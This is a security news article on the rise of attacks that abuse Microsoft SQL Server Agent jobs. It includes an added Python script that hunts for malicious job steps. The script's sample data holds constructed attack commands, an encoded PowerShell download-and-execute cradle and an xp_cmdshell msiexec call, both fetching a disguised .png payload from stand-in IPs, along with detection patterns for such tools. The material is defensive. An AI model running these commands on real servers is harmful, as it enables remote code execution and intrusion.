Repeated attacks via Microsoft SQL Server increased by 56% in 2022

Attacks using Microsoft SQL Server increased by 56% in September 2022 compared with the same month of the previous year. Threat actors continue to rely on a widely used technique that abuses Microsoft SQL Server to gain a foothold in corporate IT infrastructure. The technical details of one such incident are analyzed in Kaspersky’s new Managed Detection and Response report.

Kaspersky experts have observed an increase in attacks carried out through Microsoft SQL Server processes. SQL Server is a database management system used worldwide by both multinational companies and SMEs. In September 2022 the number of affected SQL Servers exceeded 3,000, a 56% year-over-year increase. These attacks were detected by Kaspersky Endpoint Security for Business and Managed Detection and Response.

The number of such attacks has grown steadily over the past year and has exceeded 3,000 per month since April 2022, apart from a slight dip in July and August.

“Despite the popularity of Microsoft SQL Server, organizations may not be paying enough attention to protecting against threats that may target this software. Attacks using malicious SQL Server jobs are nothing new, but they are still used by cybercriminals to gain access to a company’s infrastructure,” says Sergey Soldatov, Head of Security Operations Center at Kaspersky.

A particular problem: PowerShell scripts and .PNG files

In its new report on the most interesting Managed Detection and Response incidents, Kaspersky researchers describe an attack that abuses Microsoft SQL Server jobs: sequences of commands (job steps) that the SQL Server Agent service executes on a schedule or on demand.

“Malicious agents tried to change the server configuration to gain access to the shell to execute malware via PowerShell. The compromised SQL Server attempts to execute malicious PowerShell scripts and generates connections to external IP addresses. This PowerShell script runs the malware, disguised as a .png file, from the external IP address using the ‘MsiMake’ attribute, very similar to how the PurpleFox malware works,” says Soldatov.

Figure: an example of SQL Server jobs that contain obfuscated PowerShell commands.
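The job steps shown in the figure above are the artefact a defender can hunt for directly: every SQL Server Agent job and its step commands live in the msdb catalog, and an encoded PowerShell payload (`-EncodedCommand`, base64 of UTF-16LE) is invisible to a plain keyword grep until it is decoded. The script below is an added example, not code from the Kaspersky report or from Kaspersky. It exports the jobs with a query against the real msdb.dbo.sysjobs / msdb.dbo.sysjobsteps tables, decodes any encoded command, and scores each step against indicators taken from the incident description (download cradle, hidden window, payload served as a .png from a raw IP, the “MsiMake” string, xp_cmdshell being enabled). It assumes that the “server configuration change to gain access to the shell” was enabling xp_cmdshell via sp_configure, which the report does not state explicitly; the job names, commands and IP addresses in `SAMPLE_JOBS` are constructed for the example.

```python
"""Hunt for SQL Server Agent job steps that carry encoded PowerShell cradles or
xp_cmdshell abuse. Added example, not code from the Kaspersky report; all sample
rows, job names and IP addresses (RFC 5737 documentation ranges) are constructed."""
import base64
import re
from typing import Optional

# Real msdb catalog tables. Run this on the server (SSMS, sqlcmd, Invoke-Sqlcmd) and pass
# the resulting (job_name, step_name, subsystem, command) rows to find_suspicious_jobs().
HUNT_QUERY = """
SELECT j.name AS job_name, s.step_name, s.subsystem, s.command
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS s ON j.job_id = s.job_id;
"""

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The argument is base64 of the UTF-16LE script, so a plain grep never sees the payload.
ENCODED_ARG = re.compile(
    r"(?i)(?:^|\s)-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

# Indicators matched against the step command (base64 blob removed) plus the decoded payload.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer"),
    "inline_exec": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "xp_cmdshell": re.compile(r"(?i)xp_cmdshell|sp_configure"),
    "raw_ip_url": re.compile(r"(?i)https?://\d{1,3}(?:\.\d{1,3}){3}"),
    "payload_as_image": re.compile(r"(?i)https?://\S+\.(?:png|jpg|jpeg|gif|bmp)\b"),
    "msi_install": re.compile(r"(?i)msiexec|MsiMake"),  # "MsiMake" is the string the report names
}


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand value the way PowerShell (and an attacker) does."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(command: str) -> Optional[str]:
    """Return the plaintext behind a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_ARG.search(command)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError: bad alphabet or padding
        return None
    for codec in ("utf-16le", "utf-8"):  # PowerShell wants UTF-16LE; tolerate sloppy tooling
        try:
            return raw.decode(codec)
        except UnicodeDecodeError:
            continue
    return None


def analyze_step(job_name: str, step_name: str, subsystem: str, command: str) -> dict:
    """Score one job step. A CmdExec/PowerShell subsystem alone is only a weak signal."""
    hits = []
    if subsystem.lower() in ("cmdexec", "powershell"):
        hits.append(f"os_shell_step:{subsystem}")
    decoded = decode_encoded_command(command)
    text = command
    if decoded is not None:
        hits.append("encoded_command")
        # Drop the base64 blob before matching so random base64 cannot fake a hit,
        # then search the decoded script instead.
        text = ENCODED_ARG.sub(" -EncodedCommand <removed> ", command) + "\n" + decoded
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"job": job_name, "step": step_name, "subsystem": subsystem,
            "decoded": decoded, "indicators": hits}


def find_suspicious_jobs(rows, min_indicators: int = 2) -> list:
    """Return findings with at least min_indicators hits; 2 keeps benign PowerShell steps quiet."""
    findings = (analyze_step(*row) for row in rows)
    return [f for f in findings if len(f["indicators"]) >= min_indicators]


# Constructed sample of what HUNT_QUERY returns: two benign steps and two modelled on the
# described attack (encoded PowerShell cradle fetching a ".png"; xp_cmdshell being enabled).
SAMPLE_JOBS = [
    ("nightly_backup", "full backup", "TSQL",
     "BACKUP DATABASE Sales TO DISK = 'D:\\bak\\sales.bak' WITH INIT;"),
    ("report_export", "export", "PowerShell",
     "Import-Csv 'D:\\reports\\in.csv' | Export-Csv 'D:\\reports\\daily.csv' -NoTypeInformation"),
    ("sys_update", "step1", "CmdExec",
     "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/update.png')")),
    ("tempdb_maint", "step1", "TSQL",
     "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; "
     "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; "
     "EXEC xp_cmdshell 'cmd /c msiexec /q /i http://203.0.113.9/x.png';"),
]

if __name__ == "__main__":
    for f in find_suspicious_jobs(SAMPLE_JOBS):
        print(f"{f['job']}/{f['step']} [{f['subsystem']}]: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Two design points. First, the base64 blob is cut out before pattern matching: a long base64 string can contain “IEX” or an IP-like digit run by chance, so indicators are evaluated on the decoded script instead. Second, the default threshold of two indicators means a legitimate PowerShell or CmdExec job step is listed only when something else about it looks wrong; lower `min_indicators` to 1 to review every OS-level step on a server you do not trust. Pair the job hunt with a check of the server configuration itself, for example `SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`, since the job is only useful to the attacker once shell access has been switched on.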

To protect companies from threats, Kaspersky experts recommend implementing the following measures:

• Always keep software up to date on all the devices you use, so that attackers cannot infiltrate your network by exploiting known vulnerabilities. Install vendor security patches for new vulnerabilities as soon as possible: once a patch is actually installed (downloading it is not enough), threat actors can no longer exploit the affected vulnerability on that host.

• Use up-to-date threat intelligence to stay aware of the TTPs threat actors are currently using.

• Choose a reliable endpoint security solution, such as Kaspersky Endpoint Security for Business, which has behavior-based detection and anomaly control features for optimal protection against known and unknown threats.

• Dedicated services can help combat large-scale attacks. The Kaspersky Managed Detection and Response service helps identify and stop intrusions at an early stage, before the perpetrators reach their targets. If you are faced with an incident, the Kaspersky Incident Response service will help you react and minimize the consequences, in particular to identify compromised nodes and protect the infrastructure from similar attacks in the future.
